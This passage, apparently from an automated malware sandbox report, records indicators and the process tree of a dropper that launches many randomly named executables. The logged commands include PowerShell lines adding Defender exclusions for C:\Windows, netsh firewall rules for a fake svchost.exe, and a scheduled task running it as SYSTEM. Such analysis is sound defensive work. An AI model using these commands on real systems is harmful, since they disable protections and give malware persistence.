Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe 2000 Ouvwjy_89uDNL70EEFA2qHL5.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
foldershare.exepid process 3220 1100 foldershare.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
3gsTxWt53bh_Ip3JWz9BDOLx.exeAA4A.exepid process 2148 3gsTxWt53bh_Ip3JWz9BDOLx.exe 5944 AA4A.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 6044 msedge.exe 6044 msedge.exe 6044 msedge.exe 6044 msedge.exe 6044 msedge.exe 6044 msedge.exe 6044 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7LqbaIUgDyMj8g6M1AWB5VC1.exe0d6h2XMXnU08oZQ4umyeKupB.exeWerFault.exeWerFault.exedescription pid process Token: SeCreateTokenPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeAssignPrimaryTokenPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeLockMemoryPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeIncreaseQuotaPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeMachineAccountPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeTcbPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeSecurityPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeTakeOwnershipPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeLoadDriverPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeSystemProfilePrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeSystemtimePrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeProfSingleProcessPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeIncBasePriorityPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeCreatePagefilePrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeCreatePermanentPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeBackupPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeRestorePrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeShutdownPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeDebugPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeAuditPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeSystemEnvironmentPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeChangeNotifyPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeRemoteShutdownPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeUndockPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeSyncAgentPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeEnableDelegationPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeManageVolumePrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeImpersonatePrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeCreateGlobalPrivilege 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: 31 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: 32 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: 33 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: 34 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: 35 2668 7LqbaIUgDyMj8g6M1AWB5VC1.exe Token: SeDebugPrivilege 2284 0d6h2XMXnU08oZQ4umyeKupB.exe Token: SeRestorePrivilege 4884 WerFault.exe Token: SeBackupPrivilege 4884 WerFault.exe Token: SeRestorePrivilege 2556 WerFault.exe Token: SeBackupPrivilege 2556 WerFault.exe Token: SeBackupPrivilege 2556 WerFault.exe Token: SeShutdownPrivilege 3220 Token: SeCreatePagefilePrivilege 3220 Token: SeShutdownPrivilege 3220 Token: SeCreatePagefilePrivilege 3220 Token: SeShutdownPrivilege 3220 Token: SeCreatePagefilePrivilege 3220 Token: SeShutdownPrivilege 3220 Token: SeCreatePagefilePrivilege 3220 Token: SeShutdownPrivilege 3220 Token: SeCreatePagefilePrivilege 3220 Token: SeShutdownPrivilege 3220 Token: SeCreatePagefilePrivilege 3220 Token: SeShutdownPrivilege 3220 Token: SeCreatePagefilePrivilege 3220 Token: SeShutdownPrivilege 3220 Token: SeCreatePagefilePrivilege 3220 Token: SeShutdownPrivilege 3220 Token: SeCreatePagefilePrivilege 3220 Token: SeShutdownPrivilege 3220 Token: SeCreatePagefilePrivilege 3220 Token: SeShutdownPrivilege 3220 Token: SeCreatePagefilePrivilege 3220 Token: SeShutdownPrivilege 3220 Token: SeCreatePagefilePrivilege 3220 -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
Calculator.exeinstaller.exemsedge.exepid process 2220 Calculator.exe 2548 installer.exe 6044 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
cmd.execmd.exepid process 3408 cmd.exe 1728 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exedescription pid process target process PID 656 wrote to memory of 2000 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe Ouvwjy_89uDNL70EEFA2qHL5.exe PID 656 wrote to memory of 2000 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe Ouvwjy_89uDNL70EEFA2qHL5.exe PID 656 wrote to memory of 1772 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe qzCQ9wqiLMPlyVDD8ZFRIOqV.exe PID 656 wrote to memory of 1772 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe qzCQ9wqiLMPlyVDD8ZFRIOqV.exe PID 656 wrote to memory of 1772 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe qzCQ9wqiLMPlyVDD8ZFRIOqV.exe PID 656 wrote to memory of 5100 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe FJEIGTwa1q3oVzOT5c3cc37b.exe PID 656 wrote to memory of 5100 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe FJEIGTwa1q3oVzOT5c3cc37b.exe PID 656 wrote to memory of 5100 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe FJEIGTwa1q3oVzOT5c3cc37b.exe PID 656 wrote to memory of 2296 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe ljPNKhG9hJ6PhlrgtRr5cIFm.exe PID 656 wrote to memory of 2296 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe ljPNKhG9hJ6PhlrgtRr5cIFm.exe PID 656 wrote to memory of 2296 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe ljPNKhG9hJ6PhlrgtRr5cIFm.exe PID 656 wrote to memory of 2004 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe amD4i2PTHWZxAeh6OYXGhkWJ.exe PID 656 wrote to memory of 2004 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe amD4i2PTHWZxAeh6OYXGhkWJ.exe PID 656 wrote to memory of 2004 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe amD4i2PTHWZxAeh6OYXGhkWJ.exe PID 656 wrote to memory of 1816 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe EruXS7l1FPOtK_uzRDbujkGd.exe PID 656 wrote to memory of 1816 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe EruXS7l1FPOtK_uzRDbujkGd.exe PID 656 wrote to memory of 1816 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe EruXS7l1FPOtK_uzRDbujkGd.exe PID 656 wrote to memory of 2060 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe QO8u8gtb7uObQDhzvhRv4igC.exe PID 656 wrote to memory of 2060 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe QO8u8gtb7uObQDhzvhRv4igC.exe PID 656 wrote to memory of 2060 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe QO8u8gtb7uObQDhzvhRv4igC.exe PID 656 wrote to memory of 2284 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 0d6h2XMXnU08oZQ4umyeKupB.exe PID 656 wrote to memory of 2284 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 0d6h2XMXnU08oZQ4umyeKupB.exe PID 656 wrote to memory of 2284 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 0d6h2XMXnU08oZQ4umyeKupB.exe PID 656 wrote to memory of 2668 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 7LqbaIUgDyMj8g6M1AWB5VC1.exe PID 656 wrote to memory of 2668 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 7LqbaIUgDyMj8g6M1AWB5VC1.exe PID 656 wrote to memory of 2668 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 7LqbaIUgDyMj8g6M1AWB5VC1.exe PID 656 wrote to memory of 2924 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe yvhLYbbmmCfOlUgWABtSMRDf.exe PID 656 wrote to memory of 1648 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe enkrj5IxvWlIKv5oouKejJ5B.exe PID 656 wrote to memory of 2924 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe yvhLYbbmmCfOlUgWABtSMRDf.exe PID 656 wrote to memory of 1648 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe enkrj5IxvWlIKv5oouKejJ5B.exe PID 656 wrote to memory of 2924 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe yvhLYbbmmCfOlUgWABtSMRDf.exe PID 656 wrote to memory of 4836 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 0yNgvBPcRWcsyU3553kqC43i.exe PID 656 wrote to memory of 4836 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 0yNgvBPcRWcsyU3553kqC43i.exe PID 656 wrote to memory of 4836 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 0yNgvBPcRWcsyU3553kqC43i.exe PID 656 wrote to memory of 3656 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe NI0XHntA_fwdq3dAeQwg1aCs.exe PID 656 wrote to memory of 3656 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe NI0XHntA_fwdq3dAeQwg1aCs.exe PID 656 wrote to memory of 3656 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe NI0XHntA_fwdq3dAeQwg1aCs.exe PID 656 wrote to memory of 3152 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe Q3pIIimUP0tQUT95n2NUUh2j.exe PID 656 wrote to memory of 3152 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe Q3pIIimUP0tQUT95n2NUUh2j.exe PID 656 wrote to memory of 3152 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe Q3pIIimUP0tQUT95n2NUUh2j.exe PID 656 wrote to memory of 3416 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe WPm21lmsXt4hSyDK5j7tjJO9.exe PID 656 wrote to memory of 3416 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe WPm21lmsXt4hSyDK5j7tjJO9.exe PID 656 wrote to memory of 3416 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe WPm21lmsXt4hSyDK5j7tjJO9.exe PID 656 wrote to memory of 4056 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 04L8wfx8yzTV7egq7doWxMGm.exe PID 656 wrote to memory of 4056 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 04L8wfx8yzTV7egq7doWxMGm.exe PID 656 wrote to memory of 4056 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 04L8wfx8yzTV7egq7doWxMGm.exe PID 656 wrote to memory of 428 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 40uba9ALppp3uZizoSponZcR.exe PID 656 wrote to memory of 428 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 40uba9ALppp3uZizoSponZcR.exe PID 656 wrote to memory of 428 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 40uba9ALppp3uZizoSponZcR.exe PID 656 wrote to memory of 2208 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe ZNI8bKplPziC7FLEsLZFyzD1.exe PID 656 wrote to memory of 2208 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe ZNI8bKplPziC7FLEsLZFyzD1.exe PID 656 wrote to memory of 2208 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe ZNI8bKplPziC7FLEsLZFyzD1.exe PID 656 wrote to memory of 5056 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe aBgveQvYXSWQgZEuLsY6B7w_.exe PID 656 wrote to memory of 5056 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe aBgveQvYXSWQgZEuLsY6B7w_.exe PID 656 wrote to memory of 5056 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe aBgveQvYXSWQgZEuLsY6B7w_.exe PID 656 wrote to memory of 2628 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 3gsTxWt53bh_Ip3JWz9BDOLx.exe PID 656 wrote to memory of 2628 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 3gsTxWt53bh_Ip3JWz9BDOLx.exe PID 656 wrote to memory of 2628 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe 3gsTxWt53bh_Ip3JWz9BDOLx.exe PID 656 wrote to memory of 3332 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe FL7nNGIgUpO6QiLsiNqM69Ra.exe PID 656 wrote to memory of 3332 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe FL7nNGIgUpO6QiLsiNqM69Ra.exe PID 656 wrote to memory of 3332 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe FL7nNGIgUpO6QiLsiNqM69Ra.exe PID 656 wrote to memory of 836 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe QyJbYA0cr9LsSfWa6gVbLrL2.exe PID 656 wrote to memory of 836 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe QyJbYA0cr9LsSfWa6gVbLrL2.exe PID 656 wrote to memory of 836 656 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe QyJbYA0cr9LsSfWa6gVbLrL2.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"C:\Users\Admin\AppData\Local\Temp\022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Adobe Films\Ouvwjy_89uDNL70EEFA2qHL5.exe"C:\Users\Admin\Pictures\Adobe Films\Ouvwjy_89uDNL70EEFA2qHL5.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\qzCQ9wqiLMPlyVDD8ZFRIOqV.exe"C:\Users\Admin\Pictures\Adobe Films\qzCQ9wqiLMPlyVDD8ZFRIOqV.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 2963⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\FJEIGTwa1q3oVzOT5c3cc37b.exe"C:\Users\Admin\Pictures\Adobe Films\FJEIGTwa1q3oVzOT5c3cc37b.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 2963⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\QO8u8gtb7uObQDhzvhRv4igC.exe"C:\Users\Admin\Pictures\Adobe Films\QO8u8gtb7uObQDhzvhRv4igC.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 5603⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\EruXS7l1FPOtK_uzRDbujkGd.exe"C:\Users\Admin\Pictures\Adobe Films\EruXS7l1FPOtK_uzRDbujkGd.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 2963⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\amD4i2PTHWZxAeh6OYXGhkWJ.exe"C:\Users\Admin\Pictures\Adobe Films\amD4i2PTHWZxAeh6OYXGhkWJ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\ljPNKhG9hJ6PhlrgtRr5cIFm.exe"C:\Users\Admin\Pictures\Adobe Films\ljPNKhG9hJ6PhlrgtRr5cIFm.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\7LqbaIUgDyMj8g6M1AWB5VC1.exe"C:\Users\Admin\Pictures\Adobe Films\7LqbaIUgDyMj8g6M1AWB5VC1.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 16603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\0d6h2XMXnU08oZQ4umyeKupB.exe"C:\Users\Admin\Pictures\Adobe Films\0d6h2XMXnU08oZQ4umyeKupB.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\0yNgvBPcRWcsyU3553kqC43i.exe"C:\Users\Admin\Pictures\Adobe Films\0yNgvBPcRWcsyU3553kqC43i.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\enkrj5IxvWlIKv5oouKejJ5B.exe"C:\Users\Admin\Pictures\Adobe Films\enkrj5IxvWlIKv5oouKejJ5B.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Suspicious use of SetThreadContext
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Users\Admin\Pictures\Adobe Films\yvhLYbbmmCfOlUgWABtSMRDf.exe"C:\Users\Admin\Pictures\Adobe Films\yvhLYbbmmCfOlUgWABtSMRDf.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 3003⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\Q3pIIimUP0tQUT95n2NUUh2j.exe"C:\Users\Admin\Pictures\Adobe Films\Q3pIIimUP0tQUT95n2NUUh2j.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\NI0XHntA_fwdq3dAeQwg1aCs.exe"C:\Users\Admin\Pictures\Adobe Films\NI0XHntA_fwdq3dAeQwg1aCs.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\WPm21lmsXt4hSyDK5j7tjJO9.exe"C:\Users\Admin\Pictures\Adobe Films\WPm21lmsXt4hSyDK5j7tjJO9.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\04L8wfx8yzTV7egq7doWxMGm.exe"C:\Users\Admin\Pictures\Adobe Films\04L8wfx8yzTV7egq7doWxMGm.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\QyJbYA0cr9LsSfWa6gVbLrL2.exe"C:\Users\Admin\Pictures\Adobe Films\QyJbYA0cr9LsSfWa6gVbLrL2.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 836 -s 2963⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\FL7nNGIgUpO6QiLsiNqM69Ra.exe"C:\Users\Admin\Pictures\Adobe Films\FL7nNGIgUpO6QiLsiNqM69Ra.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\3gsTxWt53bh_Ip3JWz9BDOLx.exe"C:\Users\Admin\Pictures\Adobe Films\3gsTxWt53bh_Ip3JWz9BDOLx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\3gsTxWt53bh_Ip3JWz9BDOLx.exe"C:\Users\Admin\Pictures\Adobe Films\3gsTxWt53bh_Ip3JWz9BDOLx.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\aBgveQvYXSWQgZEuLsY6B7w_.exe"C:\Users\Admin\Pictures\Adobe Films\aBgveQvYXSWQgZEuLsY6B7w_.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies system certificate store
-
C:\Users\Admin\Documents\ewmRSwZubmvS4cOEYuAWcqn3.exe"C:\Users\Admin\Documents\ewmRSwZubmvS4cOEYuAWcqn3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\2fALarXMuVsK8Kr6mdnCh8QA.exe"C:\Users\Admin\Pictures\Adobe Films\2fALarXMuVsK8Kr6mdnCh8QA.exe"4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\wb9Z4W6sHdzd2qgFhpqZc9DO.exe"C:\Users\Admin\Pictures\Adobe Films\wb9Z4W6sHdzd2qgFhpqZc9DO.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 17325⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\KxSo365gOHwonWD80HicVHZz.exe"C:\Users\Admin\Pictures\Adobe Films\KxSo365gOHwonWD80HicVHZz.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 2965⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\V3hMvyVpqo4RRJQ0L41za8qq.exe"C:\Users\Admin\Pictures\Adobe Films\V3hMvyVpqo4RRJQ0L41za8qq.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 2925⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\zxNtqQzQWzlPqP0HPwIC8Sc1.exe"C:\Users\Admin\Pictures\Adobe Films\zxNtqQzQWzlPqP0HPwIC8Sc1.exe"4⤵
- Executes dropped EXE
